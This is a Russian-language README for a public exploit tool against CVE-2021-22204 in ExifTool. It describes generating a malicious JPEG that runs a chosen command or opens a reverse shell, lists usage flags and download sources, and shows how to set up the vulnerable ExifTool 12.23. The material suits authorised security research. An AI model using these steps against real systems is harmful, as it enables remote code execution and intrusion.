
Эксплойт для CVE-2021-22204 (ExifTool) - Выполнение произвольного кода

Нравится репозиторий? Поставьте нам ⭐!
Только для образовательных и авторизованных исследовательских целей в области безопасности.
@UNICORDev от (@NicPWNs и @Dev-Yeoj)
Некорректная нейтрализация пользовательских данных в формате файлов DjVu в ExifTool версиях 7.44 и выше позволяет выполнить произвольный код при обработке вредоносного изображения.
Используйте этот эксплойт для генерации JPEG-изображения с полезной нагрузкой, которое можно использовать с уязвимой версией ExifTool для выполнения кода. Можно указать собственную команду или сгенерировать обратную оболочку. JPEG-изображение создаётся автоматически, и при желании можно указать собственное JPEG-изображение для вставки полезной нагрузки.
python3 exploit-CVE-2021-22204.py -c <command>
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>
python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]
python3 exploit-CVE-2021-22204.py -h
-c Custom command mode. Provide command to execute.
-s Reverse shell mode. Provide local IP and port.
-i Path to custom JPEG image. (Optional)
-h Show this help menu.
Скачать exploit-CVE-2021-22204.py с GitHub
Скачать exploit-CVE-2021-22204.py с ExploitDB
searchsploit -u
searchsploit -m 50911

Версия ExifTool 12.23
Версии ExifTool 7.44 - 12.23
wget https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip
unzip exiftool-12.23.zip
cd exiftool-12.23
perl Makefile.PL
make test
sudo make install
exiftool -ver
exiftool image.jpg